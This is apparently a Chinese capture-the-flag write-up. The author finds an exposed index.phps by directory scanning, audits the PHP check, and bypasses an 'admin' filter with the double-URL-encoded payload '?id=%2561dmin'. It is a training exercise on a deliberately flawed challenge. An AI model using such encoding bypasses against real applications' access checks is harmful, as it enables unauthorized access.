拿到题目之后发现存在什么都没有,进行扫目录
扫到index.phps
收获一
index.phps 也有可能是目标文件,赶紧添加到字典中
接着进行源代码审计
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
这段代码的意思是首先提交的id不是admin,接着
id解码之后是admin
payload:
?id=%2561dmin
第一个if解码为:%61dmin*
第二个if:
第一次解码为
%61dmin
第二次解码之后为:
id=admin
或者payload是将admin进行两次编码